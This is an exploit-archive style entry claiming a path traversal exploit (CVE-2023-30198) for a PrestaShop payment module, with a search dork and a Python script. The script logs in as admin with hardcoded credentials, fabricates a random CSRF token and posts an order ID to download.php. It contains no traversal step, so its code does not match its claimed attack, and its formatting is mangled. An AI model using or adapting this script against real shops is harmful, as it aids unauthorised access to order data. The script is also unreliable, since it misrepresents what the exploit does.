# Exploit Title: PrestaShop Winbiz Payment module - Improper Limitation of a Pathname to a Restricted Directory# Date: 2023-06-20# Dork: /modules/winbizpayment/downloads/download.php# country: Iran# Exploit Author: Amirhossein Bahramizadeh# Category : webapps# Vendor Homepage: https://shop.webbax.ch/modules-pour-winbiz/153-module-prestashop-winbiz-payment-reverse.html# Version: 17.1.3 (REQUIRED)# Tested on: Windows/Linux# CVE : CVE-2023-30198import requests
import string
import random
# The base URL of the vulnerable site
base_url ="http://example.com"# The URL of the login page
login_url = base_url +"/authentication.php"# The username and password for the admin account
username ="admin"
password ="password123"# The URL of the vulnerable download.php file
download_url = base_url +"/modules/winbizpayment/downloads/download.php"# The ID of the order to download
order_id =1234# The path to save the downloaded file
file_path ="/tmp/order_%d.pdf"% order_id
# The session cookies to use for the requests
session_cookies =None# Generate a random string for the CSRF token
csrf_token =''.join(random.choices(string.ascii_uppercase + string.digits, k=32))# Send a POST request to the login page to authenticate as the admin user
login_data ={"email": username,"passwd": password,"csrf_token": csrf_token}
session = requests.Session()
response = session.post(login_url, data=login_data)# Save the session cookies for future requests
session_cookies = session.cookies.get_dict()# Generate a random string for the CSRF token
csrf_token =''.join(random.choices(string.ascii_uppercase + string.digits, k=32))# Send a POST request to the download.php file to download the order PDF
download_data ={"id_order": order_id,"csrf_token": csrf_token}
response = session.post(download_url, cookies=session_cookies, data=download_data)# Save the downloaded file to diskwithopen(file_path,"wb")as f:
f.write(response.content)# Print a message indicating that the file has been downloadedprint("File downloaded to %s"% file_path)
